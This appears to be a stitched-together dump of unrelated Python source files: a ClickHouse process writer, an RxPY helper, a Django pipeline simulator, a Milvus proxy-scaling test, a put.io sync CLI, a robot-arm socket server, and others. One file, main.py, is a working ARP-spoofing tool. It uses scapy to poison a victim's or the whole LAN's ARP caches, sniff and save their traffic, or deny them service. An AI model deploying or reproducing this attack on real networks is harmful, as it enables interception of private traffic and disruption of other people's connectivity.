# One worker per equal-sized chunk, plus a final worker for the leftover chunk.
# NOTE(review): if len(audios) < n_cpus then chunk_size is 0 and chunks()
# raises ValueError (range step 0) -- confirm inputs always exceed n_cpus.
for i, chunk in enumerate(chunks(commands_1_n, chunk_size)):
    p = multiprocessing.Process(target=do_command, args=[chunk, i])
    processes.append(p)
p = multiprocessing.Process(target=do_command, args=[command_n, i + 1])
processes.append(p)
for i, p in enumerate(processes):
    p.start()
    print("Started process {}".format(i + 1))
print("started all {} processes".format(n_cpus))
for process in processes:
    process.join()
print("\n\nDone with everything")
|
processwriter.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import multiprocessing as mp
import logging
from clickhouse_mysql.writer.writer import Writer
class ProcessWriter(Writer):
    """Writer that performs each write operation in a separate child process.

    insert()/delete()/update() each fork a ``multiprocessing.Process`` whose
    body builds a fresh downstream writer, applies the events and tears the
    writer down.  Children are deliberately not joined, so callers never
    block on the downstream write.
    """

    # Extra kwargs forwarded to the downstream writer builder.
    args = None

    def __init__(self, **kwargs):
        """Pass the builders to the base class and every other kwarg to the builder."""
        next_writer_builder = kwargs.pop('next_writer_builder', None)
        converter_builder = kwargs.pop('converter_builder', None)
        super().__init__(next_writer_builder=next_writer_builder, converter_builder=converter_builder)
        for arg in kwargs:
            self.next_writer_builder.param(arg, kwargs[arg])

    def opened(self):
        pass

    def open(self):
        pass

    def _run_in_child(self, apply_events, event_or_events):
        """Child-process body: build a writer, apply the events, flush and destroy it."""
        logging.debug('class:%s process()', __class__)
        writer = self.next_writer_builder.get()
        apply_events(writer, event_or_events)
        writer.close()
        writer.push()
        writer.destroy()
        logging.debug('class:%s process() done', __class__)

    def process(self, event_or_events=None):
        """Separate process body for inserts."""
        self._run_in_child(lambda writer, events: writer.insert(events), event_or_events)

    def processDelete(self, event_or_events=None):
        """Separate process body for row deletes."""
        self._run_in_child(lambda writer, events: writer.deleteRow(events), event_or_events)

    def processUpdate(self, event_or_events=None):
        """Separate process body for updates.

        NOTE(review): this calls writer.delete(), not an update method --
        preserved as-is, but confirm upstream whether update is intentionally
        modelled as a delete.
        """
        self._run_in_child(lambda writer, events: writer.delete(events), event_or_events)

    def _spawn(self, label, target, event_or_events):
        """Start (and intentionally do not join) a child process running *target*."""
        logging.debug('class:%s %s', __class__, label)
        process = mp.Process(target=target, args=(event_or_events,))
        logging.debug('class:%s %s.process.start()', __class__, label)
        process.start()
        logging.debug('class:%s %s done', __class__, label)

    def insert(self, event_or_events=None):
        # event_or_events = [{'row': {'id': 3, 'a': 3}}, ...]
        self._spawn('insert', self.process, event_or_events)

    def delete(self, event_or_events=None):
        # event_or_events = [{'row': {'id': 3, 'a': 3}}, ...]
        self._spawn('delete', self.processDelete, event_or_events)

    def update(self, event_or_events=None):
        # event_or_events = [{'row': {'id': 3, 'a': 3}}, ...]
        self._spawn('update', self.processUpdate, event_or_events)

    def flush(self):
        pass

    def push(self):
        pass

    def destroy(self):
        pass

    def close(self):
        pass
|
concurrency.py | from threading import Thread
from rx.core.typing import StartableTarget
def default_thread_factory(target: StartableTarget) -> Thread:
    """Wrap *target* in a daemon thread (the library-wide default factory)."""
    worker = Thread(target=target, daemon=True)
    return worker
def synchronized(lock):
    """A decorator for synchronizing access to a given function."""
    def decorate(fn):
        def guarded(*args, **kw):
            lock.acquire()
            try:
                return fn(*args, **kw)
            finally:
                lock.release()
        return guarded
    return decorate
|
dummy.py | '''
Copyright 2013 Douglas Gibbons
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import logging
from django.core.management.base import BaseCommand
import httplib,urllib
import datetime
import random
import time
import threading
from boto.dynamodb.condition import NULL
''' Pretends to be a whole pipeline; adding builds,deploys,testruns in real time'''
logger = logging.getLogger(__name__)
class Dummy(BaseCommand):
    """Management command that simulates a full delivery pipeline in real time.

    One thread per product repeatedly reports builds, deploys and test runs
    to the local dashboard over HTTP, with random pauses between steps.
    """

    def nowString(self):
        """Return the timestamp string sent to the dashboard.

        The dashboard accepts the literal text 'now' for the current time,
        so no clock formatting is needed.
        """
        # return datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        return 'now'

    def sleepRandom(self):
        """Sleep a random 0-29 seconds so events arrive at a realistic pace."""
        minTime = 0  # seconds
        maxTime = 30
        t = random.randrange(minTime, maxTime, 1)
        logger.debug('Sleeping for ' + str(t) + ' seconds')
        time.sleep(t)

    def getUrl(self, url, dict):
        """GET *url* on the local dashboard with *dict* as the query string.

        Returns the response body, which the dashboard uses to carry the id
        of the record that was created or updated.
        """
        hostname = 'localhost'
        port = 8000
        conn = httplib.HTTPConnection(hostname, port)
        params = urllib.urlencode(dict)
        logger.debug('Getting ' + url)
        conn.request("GET", url + '?' + params)
        response = conn.getresponse()
        id = response.read()
        logger.debug('Got back ID ' + str(id))
        return id

    def createBuild(self, productName, version):
        """Register the start of a build; returns the new build id."""
        url = '/dash/new_build'
        dict = {
            'Product.name': productName,
            'Build.version': version,
            'Build.revision': '1000',
            'Build.start': self.nowString()
        }
        id = self.getUrl(url, dict)
        return id

    def updateBuild(self, id, success):
        """Finish build *id* (after a random delay) with the given outcome."""
        self.sleepRandom()
        url = '/dash/update_build'
        dict = {
            'Build.id': str(id),
            'Build.success': success,
            'Build.end': self.nowString()
        }
        self.getUrl(url, dict)

    def createDeploy(self, productName, version, environment, hostname=False):
        """Register the start of a deploy; *hostname* is optional."""
        logger.debug('Deploying ' + version)
        url = '/dash/new_deploy'
        dict = {
            'Product.name': productName,
            'Deploy.version': version,
            'Environment.name': environment,
            'Deploy.start': self.nowString()
        }
        if hostname:
            dict.update({'Host.name': hostname})
        id = self.getUrl(url, dict)
        return id

    def updateDeploy(self, id, success):
        """Finish deploy *id* with the given outcome."""
        url = '/dash/update_deploy'
        dict = {
            'Deploy.id': str(id),
            # BUG FIX: the success flag was hard-coded to '1', silently
            # ignoring the argument; report what the caller passed in.
            # (All current callers pass 1, so behavior is unchanged for them.)
            'Deploy.success': success,
            'Deploy.end': self.nowString()
        }
        self.getUrl(url, dict)

    def createTest(self, productName, version):
        """Register the start of a 'Sanity' test run; returns the run id."""
        logger.debug('Testing ' + version)
        url = '/dash/new_testrun'
        dict = {
            'Product.name': productName,
            'Testpack.name': 'Sanity',
            'Testrun.version': version,
            'Environment.name': 'Test',
            'Testrun.start': self.nowString()
        }
        id = self.getUrl(url, dict)
        return id

    def updateTest(self, id, success):
        """Finish test run *id* with the given outcome."""
        url = '/dash/update_testrun'
        dict = {
            'Testrun.id': str(id),
            'Testrun.success': success,
            'Testrun.end': self.nowString()
        }
        self.getUrl(url, dict)

    def delivery(self, productName):
        """Run thirty build -> deploy -> test -> release cycles for one product."""
        for i in range(30):
            success = 1
            version = '1.0-' + str(i)
            # Build
            logger.debug('Building version ' + version)
            id = self.createBuild(productName, version)
            self.sleepRandom()
            self.updateBuild(id, success)
            # Deploy to the two test hosts
            id = self.createDeploy(productName, version, "Test", "testhost1")
            self.sleepRandom()
            self.updateDeploy(id, success)
            id = self.createDeploy(productName, version, "Test", "testhost2")
            self.sleepRandom()
            self.updateDeploy(id, success)
            # Test, with roughly a one-in-three chance of failure
            id = self.createTest(productName, version)
            self.sleepRandom()
            self.sleepRandom()
            if random.randrange(0, 3, 1) == 1:
                self.updateTest(id, '')
            else:
                self.updateTest(id, 1)
            # Deploy to staging. Note: no hostname given; should be ok.
            id = self.createDeploy(productName, version, "Staging")
            self.sleepRandom()
            self.updateDeploy(id, success)
            self.sleepRandom()
            # Deploy to production
            id = self.createDeploy(productName, version, "Production", "testprod1")
            self.sleepRandom()
            self.updateDeploy(id, success)
            id = self.createDeploy(productName, version, "Production", "testprod2")
            self.sleepRandom()
            self.updateDeploy(id, success)

    def run(self):
        """Start one delivery thread per demo product."""
        threads = []
        for product in ['UI', 'API', 'DB', 'Reports', 'Security']:
            t = threading.Thread(target=self.delivery, args=(product,))
            threads.append(t)
            t.start()
|
test_proxy_scale.py | import multiprocessing
import pytest
from customize.milvus_operator import MilvusOperator
from common import common_func as cf
from common.common_type import CaseLabel
from scale import scale_common as sc, constants
from utils.util_log import test_log as log
from utils.util_k8s import wait_pods_ready
prefix = "proxy_scale"
class TestProxyScale:
    """Proxy-replica scaling tests against a Milvus operator deployment."""

    def e2e_milvus_parallel(self, process_num, host, c_name):
        """Run the shared e2e Milvus workload in *process_num* concurrent processes."""
        workers = [
            multiprocessing.Process(target=sc.e2e_milvus, args=(host, c_name))
            for _ in range(process_num)
        ]
        for proc in workers:
            proc.start()
        for proc in workers:
            proc.join()

    @pytest.mark.tags(CaseLabel.L3)
    def test_scale_proxy(self):
        """
        target: test milvus operation after proxy expand
        method: 1.deploy 1 proxy replicas
                2.milvus e2e test in parallel
                3.expand proxy pod from 1 to 5
                4.milvus e2e test
                5.shrink proxy from 5 to 2
        expected: 1.verify data consistent and func work
        """
        # deploy milvus cluster with one proxy
        release_name = "scale-proxy"
        image = f'{constants.IMAGE_REPOSITORY}:{constants.IMAGE_TAG}'
        deploy_config = {
            'metadata.namespace': constants.NAMESPACE,
            'metadata.name': release_name,
            'spec.components.image': image,
            'spec.components.proxy.serviceType': 'LoadBalancer',
            'spec.components.proxy.replicas': 1,
            'spec.components.dataNode.replicas': 2,
            'spec.config.dataCoord.enableCompaction': True,
            'spec.config.dataCoord.enableGarbageCollection': True,
        }
        operator = MilvusOperator()
        operator.install(deploy_config)
        healthy = operator.wait_for_healthy(release_name, constants.NAMESPACE, timeout=1200)
        log.info(f"milvus healthy: {healthy}")
        host = operator.endpoint(release_name, constants.NAMESPACE).split(':')[0]
        c_name = cf.gen_unique_str(prefix)
        self.e2e_milvus_parallel(5, host, c_name)
        log.info('Milvus test before expand')
        # Scale the proxy: expand 1 -> 5, then shrink 5 -> 2, re-running the
        # workload after each step.
        for replicas, workers, phase in ((5, 5, 'expand'), (2, 2, 'shrink')):
            operator.upgrade(release_name, {'spec.components.proxy.replicas': replicas}, constants.NAMESPACE)
            wait_pods_ready(constants.NAMESPACE, f"app.kubernetes.io/instance={release_name}")
            self.e2e_milvus_parallel(workers, host, c_name)
            log.info(f'Milvus test after {phase}')
        # mic.uninstall(release_name, namespace=constants.NAMESPACE)
|
frontend.py | import argparse
import shlex
import sys
import threading
import subprocess
import putiopy
import re
import logging
from pid import PidFile
from putiosync.core import TokenManager, PutioSynchronizer, DatabaseManager
from putiosync.download_manager import DownloadManager
from putiosync.watcher import TorrentWatcher
from putiosync.webif.webif import WebInterface
__author__ = 'Paul Osborne'
logger = logging.getLogger("putiosync")
logger.setLevel(logging.ERROR)
def parse_arguments():
    """Define the putio-sync command line and parse sys.argv.

    Returns:
        The parsed ``argparse.Namespace``.
    """
    cli = argparse.ArgumentParser()
    cli.add_argument(
        "-k", "--keep",
        help="Keep files on put.io; do not automatically delete",
        action="store_true",
        default=False,
    )
    cli.add_argument(
        "--force-keep",
        help=(
            "Filter for skipping deletion of specific files/folders. "
            "If keep parameter is set to false, only files/folders will be deleted which "
            "do not match the given regex. "
            "Example: putio-sync -force-keep=\"^/Series$\" /path/to/Downloads"
        ),
        type=str,
        default=None,
    )
    cli.add_argument(
        "-q", "--quiet",
        help="Prevent browser from launching on start.",
        action="store_true",
        default=False,
    )
    cli.add_argument(
        "-p", "--poll-frequency",
        help="Polling frequency in seconds (default: 3 minutes)",
        type=int,
        default=60 * 3,
    )
    cli.add_argument(
        "--pid",
        help="Path where the pid file should be created (default: None)",
        type=str,
        default=None,
    )
    cli.add_argument(
        "--log",
        help="Path where the log file should be stored (default: None)",
        type=str,
        default=None,
    )
    cli.add_argument(
        "--log-webif",
        help="Path where the log file for the web interface should be stored (default: None)",
        type=str,
        default=None,
    )
    cli.add_argument(
        "--log-level",
        help="Loglevel [debug, info, warning, error, critical] (default: debug)",
        type=str,
        default="debug",
    )
    cli.add_argument(
        "-c", "--post-process-command",
        help=(
            "Command to be executed after the completion of every download. "
            "The command will be executed with the path to the file that has "
            "just been completed as an argument. "
            "Example: putio-sync -c 'python /path/to/postprocess.py' /path/to/Downloads"
        ),
        type=str,
        default=None,
    )
    cli.add_argument(
        "-w", "--watch-directory",
        help=(
            "Directory to watch for torrent or magnet files. If this option is "
            "present and new files are added, they will be added to put.io and "
            "automatically downloaded by the daemon when complete."
        ),
        type=str,
        default=None,
    )
    cli.add_argument(
        "--host",
        help="Host where the webserver should listen to. Default: 0.0.0.0",
        type=str,
        default="0.0.0.0",
    )
    cli.add_argument(
        "--port",
        help="Port where the webserver should listen to. Default: 7001",
        type=int,
        default=7001,
    )
    cli.add_argument(
        "-f", "--filter",
        help=(
            "Filter for excluding or including specific files/folders from downloading. "
            "The filter is a regular expression (regex). "
            "Example: putio-sync -f '/some/folder/*.avi' /path/to/Downloads"
        ),
        type=str,
        default=None,
    )
    cli.add_argument(
        "download_directory",
        help="Directory into which files should be downloaded",
    )
    return cli.parse_args()
def build_postprocess_download_completion_callback(postprocess_command):
    """Create a download-completion callback that runs *postprocess_command*.

    The returned callback substitutes the completed download's destination
    path into the ``{0}`` placeholder of the command template and executes
    the result in a shell.

    Args:
        postprocess_command: command template, e.g. ``"python post.py {0}"``.

    Returns:
        A one-argument callable suitable for
        ``DownloadManager.add_download_completion_callback``.
    """
    def download_completed(download):
        # BUG FIX: the original formatted the *encoded* path (a bytes object),
        # which under Python 3 injected a literal "b'...'" into the shell
        # command. Pass the text path, shell-quoted so paths containing
        # spaces or metacharacters survive shell=True.
        path = shlex.quote(download.get_destination_path())
        cmd = postprocess_command.format(path)
        logger.info("Postprocess: {0}".format(cmd))
        subprocess.call(cmd, shell=True)
    return download_completed
def _compile_regex_or_exit(pattern, option_name):
    """Compile *pattern* or exit(1) with a message; ``None`` passes through."""
    if pattern is None:
        return None
    try:
        return re.compile(pattern)
    except re.error as e:
        print("Invalid {0} regex: {1}".format(option_name, e))
        sys.exit(1)


def start_sync(args):
    """Configure logging, obtain a valid put.io token, and run the synchronizer.

    Blocks serving the web interface; the synchronizer itself runs on a
    daemon thread so it cannot keep the process alive on its own.

    Args:
        args: parsed namespace from ``parse_arguments()``.
    """
    formatter = logging.Formatter('%(asctime)s | %(name)-12s | %(levelname)-8s | %(message)s')
    # Map the --log-level name to a logging constant; unknown names warn and
    # fall back to ERROR (the historical behavior).
    level_names = {
        "debug": logging.DEBUG,
        "info": logging.INFO,
        "warning": logging.WARNING,
        "error": logging.ERROR,
        "critical": logging.CRITICAL,
    }
    log_level = logging.ERROR
    if args.log_level is not None:
        if args.log_level in level_names:
            log_level = level_names[args.log_level]
        else:
            print("Invalid log-level argument")
    ch = logging.StreamHandler()
    ch.setLevel(log_level)
    ch.setFormatter(formatter)
    # Main logger: file handler when --log is given, otherwise the console.
    if args.log is not None:
        fh = logging.FileHandler(args.log)
        fh.setLevel(log_level)
        fh.setFormatter(formatter)
        logger.addHandler(fh)
    else:
        logger.addHandler(ch)
    # Web-interface (werkzeug) logging mirrors the main logger's setup.
    log_webif = logging.getLogger('werkzeug')
    log_webif.setLevel(log_level)
    log_webif.disabled = True
    if args.log_webif is not None:
        fh = logging.FileHandler(args.log_webif)
        fh.setLevel(log_level)
        fh.setFormatter(formatter)
        log_webif.addHandler(fh)
    else:
        log_webif.addHandler(ch)
    # Restore or obtain a valid token
    token_manager = TokenManager()
    token = token_manager.get_token()
    while not token_manager.is_valid_token(token):
        print("No valid token found! Please provide one.")
        token = token_manager.obtain_token()
        token_manager.save_token(token)
    # Let's start syncing!
    putio_client = putiopy.Client(token)
    db_manager = DatabaseManager()
    download_manager = DownloadManager(token=token)
    if args.post_process_command is not None:
        download_manager.add_download_completion_callback(
            build_postprocess_download_completion_callback(args.post_process_command))
    if args.watch_directory is not None:
        torrent_watcher = TorrentWatcher(args.watch_directory, putio_client)
        torrent_watcher.start()
    # BUG FIX: the two regex options previously duplicated the compile/exit
    # logic and used the builtin `exit()` (absent under some interpreters);
    # both now go through _compile_regex_or_exit which calls sys.exit(1).
    filter_compiled = _compile_regex_or_exit(args.filter, "filter")
    force_keep_compiled = _compile_regex_or_exit(args.force_keep, "force_keep")
    download_manager.start()
    synchronizer = PutioSynchronizer(
        download_directory=args.download_directory,
        putio_client=putio_client,
        db_manager=db_manager,
        download_manager=download_manager,
        keep_files=args.keep,
        poll_frequency=args.poll_frequency,
        download_filter=filter_compiled,
        force_keep=force_keep_compiled,
        disable_progress=args.log is not None)
    # daemon=True replaces the deprecated setDaemon(); the sync loop must die
    # with the main thread once the web interface exits.
    t = threading.Thread(target=synchronizer.run_forever, daemon=True)
    t.start()
    web_interface = WebInterface(db_manager, download_manager, putio_client, synchronizer, launch_browser=(not args.quiet), host=args.host, port=args.port)
    web_interface.run()
def main():
    """Parse the CLI and run the synchronizer, optionally guarded by a pid file."""
    args = parse_arguments()
    if args.pid is None:
        return start_sync(args)
    with PidFile(args.pid):
        return start_sync(args)
# Script entry point: the process exit code is whatever main() returns.
if __name__ == '__main__':
    sys.exit(main())
|
main.py | from scapy.all import *
import os
import signal
import sys
import threading
import time
import subprocess
import socket
# Derive LAN parameters from our own IPv4 address on en0 (macOS-specific
# tooling: ipconfig/route). decode().strip() replaces the fragile slicing of
# the bytes repr (str(b"...")[2:-3]) used originally.
self_ip = subprocess.check_output("ipconfig getifaddr en0", shell=True).decode().strip()
octets = self_ip.split(".")
lan = octets[0] + "." + octets[1] + "." + octets[2]
# BUG FIX: the original read lan[3] AFTER `lan` had been rebuilt as the
# "a.b.c" prefix string, yielding a single character instead of our host
# octet; the skip-self checks (`i == self_id`, with int i) could therefore
# never match. Store the real final octet as an int.
self_id = int(octets[3])
nmap_broadcast = lan + ".1/24"
# Default gateway address; `cut` leaves surrounding whitespace, so strip().
gateway_ip = subprocess.check_output("route get default | grep gateway | cut -f 2 -d \":\"", shell=True).decode().strip()
gateway_mac = ""
packet_count = 1000
hosts = dict()
online_hosts = dict()
def get_online_hosts_with_mac():
    """Populate the global ``hosts`` {ip: mac} map from the ARP cache.

    Ping-scans the LAN first so the ARP cache is warm, then parses ``arp -a``
    output. Also records the gateway's MAC in the global ``gateway_mac``.
    """
    print("finding all the hosts with mac addresses in the lan")
    global hosts, gateway_mac
    subprocess.check_output("nmap -sP " + nmap_broadcast, shell=True)
    # BUG FIX: check_output returns bytes, so the original `== ""` test could
    # never be true; decode before comparing.
    arp_result = subprocess.check_output("arp -a", shell=True).decode()
    if arp_result == "":
        print("no online hosts were find or internet connection is lost")
        return
    # Each line looks like: "name (ip) at mac on en0 ..."; drop the trailing
    # empty line produced by the final newline.
    for line in arp_result.split('\n')[:-1]:
        fields = line.split(" ")
        if fields[3] == "(incomplete)":
            continue
        ip = fields[1][1:-1]  # strip the surrounding parentheses
        hosts[ip] = fields[3]
        if ip == gateway_ip:
            gateway_mac = fields[3]
def get_online_hosts():
    """Populate the global ``online_hosts`` {ip: mac} map from the ARP cache."""
    print("finding all the hosts with mac addresses in the lan")
    global online_hosts
    subprocess.check_output("nmap -sP " + nmap_broadcast, shell=True)
    # BUG FIX: check_output returns bytes, so the original `== ""` test could
    # never be true; decode before comparing.
    arp_result = subprocess.check_output("arp -a", shell=True).decode()
    if arp_result == "":
        print("no online hosts were find or internet connection is lost")
        return
    for line in arp_result.split('\n')[:-1]:
        fields = line.split(" ")
        # NOTE(review): unlike get_online_hosts_with_mac(), "(incomplete)"
        # entries are not skipped here; preserved, but confirm intent.
        online_hosts[fields[1][1:-1]] = fields[3]
def arp_poison(target_ip):
    """ARP-spoof *target_ip* and the gateway (one packet pair per second)
    until interrupted, then restore the real mappings."""
    global gateway_mac, gateway_ip
    # Lazily discover the gateway MAC and host table if not yet known.
    if gateway_ip == "" or gateway_mac == "":
        get_online_hosts_with_mac()
    print("starting the mitm attack")
    try:
        while True:
            # Tell the gateway we are the victim, and the victim we are the
            # gateway (op=2 = ARP reply; our own MAC is used as hwsrc).
            send(ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac, psrc=target_ip), verbose=False)
            send(ARP(op=2, pdst=target_ip, hwdst=hosts[target_ip], psrc=gateway_ip), verbose=False)
            time.sleep(1)
    except KeyboardInterrupt:
        print("restoring network")
        restore()
    except Exception as e:
        print(e)
def arp_poison_broadcast():
    """ARP-spoof every known LAN host against the gateway, looping until
    interrupted, then restore the real mappings."""
    global gateway_mac, gateway_ip
    # Lazily discover the gateway MAC and host table if not yet known.
    if gateway_ip == "" or gateway_mac == "":
        get_online_hosts_with_mac()
    print("starting the mitm attack")
    try:
        while True:
            for i in range(1, 255):
                # NOTE(review): verify self_id's type -- it must be an int
                # for this skip-self comparison to ever match.
                if i == self_id:
                    continue
                target_ip = lan + "." + str(i)
                if target_ip not in hosts.keys():
                    continue
                send(ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac, psrc=target_ip), verbose=False)
                send(ARP(op=2, pdst=target_ip, hwdst=hosts[target_ip], psrc=gateway_ip), verbose=False)
                #time.sleep(2)
    except KeyboardInterrupt:
        # NOTE(review): restore() fixes only a single victim; it seems
        # restore_broadcast() was intended here -- confirm.
        print("restoring network")
        restore()
    except Exception as e:
        print(e)
def mitm_callback(pkt):
    """scapy sniff callback: dump each intercepted packet to stdout."""
    pkt.show()
def enable_forwarding():
    # macOS sysctl: enable IPv4 forwarding so intercepted traffic is relayed.
    os.system("sudo sysctl -w net.inet.ip.forwarding=1")
def disable_forwarding():
    # macOS sysctl: disable IPv4 forwarding so poisoned traffic is dropped.
    os.system("sudo sysctl -w net.inet.ip.forwarding=0")
def restore(target=None):
    """Re-broadcast the true ARP mappings for the gateway and a victim.

    Args:
        target: victim IP address. When omitted, falls back to the module
            global ``target_ip`` set by the interactive menu -- the original,
            implicit dependency, made explicit and optional here.
    """
    victim = target if target is not None else target_ip
    send(ARP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=gateway_ip, hwsrc=hosts[victim], psrc=victim), count=5, verbose=False)
    send(ARP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=victim, hwsrc=gateway_mac, psrc=gateway_ip), count=5, verbose=False)
    # NOTE(review): the original re-enables forwarding here (the disable call
    # is commented out); behavior preserved, but disable_forwarding() looks
    # like it may have been intended.
    #disable_forwarding()
    enable_forwarding()
def restore_broadcast():
    """Broadcast the true ARP mappings for the gateway and every known host,
    then re-enable forwarding."""
    for i in range(1, 255):
        # NOTE(review): verify self_id's type -- it must be an int for this
        # skip-self comparison to ever match.
        if i == self_id:
            continue
        target_ip = lan + "." + str(i)
        if target_ip not in hosts.keys():
            continue
        send(ARP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=gateway_ip, hwsrc=hosts[target_ip], psrc=target_ip), count=5, verbose=False)
        send(ARP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=target_ip, hwsrc=gateway_mac, psrc=gateway_ip), count=5, verbose=False)
    #disable_forwarding()
    enable_forwarding()
# Interactive menu: host discovery, targeted or LAN-wide ARP MITM / DoS.
while 1:
    print("select from below options")
    print("1 get online hosts with mac addresses")
    print("2 mitm on a victim")
    print("3 dos on a victim")
    print("4 mitm on the lan")
    print("5 dos on the lan")
    option = input()
    if option == "1":
        get_online_hosts_with_mac()
        for key, value in hosts.items():
            if key == gateway_ip and value == gateway_mac:
                print(key + " at " + value + " as gateway")
                continue
            try:
                # BUG FIX: socket.gethostbyaddr() returns a (hostname,
                # aliases, addresses) tuple; concatenating the tuple to a str
                # always raised TypeError, so the hostname was never printed.
                print(key + " at " + value + " " + socket.gethostbyaddr(key)[0])
            except Exception:
                print(key + " at " + value)
        print()
    elif option == "2":
        print("enter the ip of the victim")
        target_ip = input()
        if target_ip == self_ip:
            print("cannot attack yourself")
            print()
            continue
        else:
            try:
                # Forwarding on: victim traffic keeps flowing through us (MITM).
                enable_forwarding()
                poison_thread = threading.Thread(target=arp_poison, args=(target_ip,))
                poison_thread.start()
                sniff_filter = "ip host " + target_ip
                print(f"[*] Starting network capture. Filter: {sniff_filter}")
                packets = sniff(filter=sniff_filter, prn=mitm_callback, iface="en0")
                wrpcap(target_ip + "_capture.pcap", packets)
            except KeyboardInterrupt:
                print("restoring network")
                restore()
            print("restoring network")
            restore()
    elif option == "3":
        print("enter the ip of the victim")
        target_ip = input()
        if target_ip == self_ip:
            print("cannot attack yourself")
            print()
            continue
        else:
            try:
                # Forwarding off: poisoned traffic is dropped (DoS).
                disable_forwarding()
                poison_thread = threading.Thread(target=arp_poison, args=(target_ip,))
                poison_thread.start()
                sniff_filter = "ip host " + target_ip
                print(f"[*] Starting network capture. Filter: {sniff_filter}")
                packets = sniff(filter=sniff_filter, prn=mitm_callback, iface="en0")
                wrpcap(target_ip + "_denied.pcap", packets)
            except KeyboardInterrupt:
                print("restoring network")
                restore()
            print("restoring network")
            restore()
    elif option == "4":
        try:
            enable_forwarding()
            poison_thread = threading.Thread(target=arp_poison_broadcast)
            poison_thread.start()
            print(f"[*] Starting network capture.")
            packets = sniff(prn=mitm_callback, iface="en0")
            wrpcap("lan_capture.pcap", packets)
        except KeyboardInterrupt:
            # BUG FIX: the original called restore() here, which targets a
            # single victim via a global that may be unset (NameError) --
            # the LAN-wide attack needs the broadcast restore.
            print("restoring network")
            restore_broadcast()
        print("restoring network")
        restore_broadcast()
    elif option == "5":
        try:
            disable_forwarding()
            # Three poison threads to raise the spoof rate across the LAN.
            poison_thread1 = threading.Thread(target=arp_poison_broadcast)
            poison_thread1.start()
            poison_thread2 = threading.Thread(target=arp_poison_broadcast)
            poison_thread2.start()
            poison_thread3 = threading.Thread(target=arp_poison_broadcast)
            poison_thread3.start()
            print(f"[*] Starting network capture.")
            packets = sniff(prn=mitm_callback, iface="en0")
            wrpcap("lan_denied.pcap", packets)
        except KeyboardInterrupt:
            print("restoring network")
            restore_broadcast()
        disable_forwarding()
|
ArmServer.py | #!/usr/bin/python3
# encoding: utf-8
import socketserver
import threading
import time
import re
import ArmController as controller #舵机转动
import LeConf #偏差
from ArmCmd import LeError
import ArmCmd
import ArmWebServer as web
class ServoServer(socketserver.BaseRequestHandler):
    """TCP request handler parsing CRLF-terminated "Ixxx-..." servo commands
    and dispatching them to the ArmCmd command table."""
    def handle(self):
        """Read commands from the connection until it closes or errors.

        Protocol: ASCII frames of the form "I<nnn>-p1-p2-...\\r\\n". Spaces
        are stripped; one complete frame is processed per recv iteration.
        Commands 3..7 receive the connection plus raw string params; all
        others get integer-converted params.
        """
        print("已连接")
        conn = self.request
        Flag = True
        recv = b''
        recv_data = ""
        while Flag:
            try:
                recv = conn.recv(1024)
                recv_data += recv.decode()
                # print(recv_data)
                # Empty receive buffer means the peer closed the connection.
                if not recv_data:
                    Flag = False
                    print("break")
                    break
                recv_data = recv_data.replace(' ', '')
                cp = re.compile(r'\r\n')
                test = cp.search(recv_data)
                if test:
                    rdata = recv_data.split("\r\n")  # split off the first complete frame
                    # Keep the unconsumed tail (+2 skips the CRLF itself).
                    recv_data = recv_data[len(rdata[0]) + 2:]
                    rdata = [rdata[0]]
                    for data in rdata:
                        if data:
                            rex = re.compile(r'^(I[0-9]{3}).*')  # does the received command match the protocol?
                            match = data
                            #print(match)
                            match = rex.match(match)
                            # print('******')
                            if match:
                                # The match must cover the whole frame.
                                if not 0 == match.start() or not len(data) == match.end():
                                    print("错误指令 1")
                                else:
                                    data = data.split('-')
                                    cmd = data[0][1:5]
                                    del data[0]
                                    par = []
                                    #print(data)
                                    try:
                                        cmd = int(cmd)
                                        # Commands 3..7 take the connection and
                                        # raw params; others take ints only.
                                        if cmd >= 3 and cmd <= 7:
                                            print(cmd)
                                            ArmCmd.cmd_list[cmd](conn, data)
                                        else:
                                            for p in data:
                                                par.append(int(p))
                                            print(cmd, par)
                                            ArmCmd.cmd_list[cmd](par)
                                    except LeError as err:
                                        print(err.msg)
                                        print(err.data)
                                    except:
                                        # NOTE(review): bare except also hides
                                        # bad command ids / non-int params.
                                        print("指令执行错误")
                if not Flag:
                    print("break1")
                    break
            except Exception as e:
                print(e)
                break
    def finish(self):
        """Called by socketserver when the connection is torn down."""
        print("已断开")
class LeServer(socketserver.ThreadingTCPServer):
    """Threaded TCP server; SO_REUSEADDR lets it rebind quickly after restart."""
    allow_reuse_address = True
if __name__ == "__main__":
    # Validate the per-servo deviation (trim) table before starting.
    if not len(LeConf.Deviation) == 6:
        print("偏差数量错误")
        # BUG FIX: the original called sys.exit() without importing sys
        # (NameError); SystemExit needs no import and sets a failure status.
        raise SystemExit(1)
    d = []
    for dev in LeConf.Deviation:
        if dev > 1600 or dev < 1400:
            # BUG FIX: the message previously claimed the range 1200-1800,
            # contradicting the 1400-1600 check above.
            print("偏差值超出范围1400-1600")
            raise SystemExit(1)
        d.append(dev - 1500)
    controller.initLeArm(tuple(d))
    # Move all six servos to their initial positions.
    ArmCmd.cmd_i001([1000, 6, 1, 1500, 2, 1500, 3, 1500, 4, 1500, 5, 1500, 6, 500])
    server = LeServer(("", 8947), ServoServer)
    try:
        # Serve the command socket on a background thread while the web UI
        # runs; the sleep loop keeps the main thread interruptible.
        server_thread = threading.Thread(target=server.serve_forever)
        server_thread.start()
        web.run()
        while True:
            time.sleep(0.1)
    except:
        # Deliberately broad: any interruption (Ctrl-C included) shuts the
        # server down and stops the arm.
        server.shutdown()
        server.server_close()
        controller.stopLeArm()
|
gateio.py | from befh.restful_api_socket import RESTfulApiSocket
from befh.exchanges.gateway import ExchangeGateway
from befh.market_data import L2Depth, Trade
from befh.util import Logger
from befh.instrument import Instrument
from befh.clients.sql_template import SqlClientTemplate
from functools import partial
